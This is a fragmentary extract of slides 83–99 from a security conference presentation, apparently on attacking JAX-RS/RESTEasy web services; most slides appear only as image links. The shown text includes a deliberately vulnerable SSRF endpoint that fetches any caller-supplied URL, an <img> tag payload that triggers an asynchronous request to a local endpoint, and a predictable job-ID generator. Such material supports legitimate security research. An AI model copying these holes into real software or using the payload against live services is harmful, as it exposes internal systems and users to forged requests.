![Page 83: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/83.jpg)
@GET
@Path("/ssrf/pwn")
@Produces(MediaType.APPLICATION_JSON)
public Response getFromRemoteApp(@QueryParam("url") String url) {
Client client = ClientBuilder.newBuilder().build();
WebTarget target = client.target(url);
Response response = target.request().get();
ArrayList value = response.readEntity(ArrayList.class);
response.close();
return Response.status(200).entity(value).build();
}
83 / 99
![Page 84: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/84.jpg)
84 / 99
![Page 85: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/85.jpg)
85 / 99
![Page 86: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/86.jpg)
![Page 87: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/87.jpg)
<context-param>
<param-name>resteasy.async.job.service.enabled</param-name>
<param-value>true</param-value>
</context-param>
87 / 99
![Page 88: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/88.jpg)
@GET
@Path("/profile/me")
@Produces(MediaType.APPLICATION_JSON)
public Profile doShowProfile()
{
return new Profile();
}
88 / 99
![Page 89: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/89.jpg)
89 / 99
![Page 90: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/90.jpg)
<img src="http://127.0.0.1:8080/unsafe-jaxrs/profile/me?asynch=true" />
90 / 99
![Page 91: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/91.jpg)
91 / 99
![Page 92: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/92.jpg)
String id = "" + System.currentTimeMillis() + "-" +
counter.incrementAndGet();
92 / 99
![Page 94: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/94.jpg)
![Page 96: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/96.jpg)
96 / 99
![Page 97: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/97.jpg)
97 / 99
![Page 98: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/98.jpg)
98 / 99
![Page 99: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/99.jpg)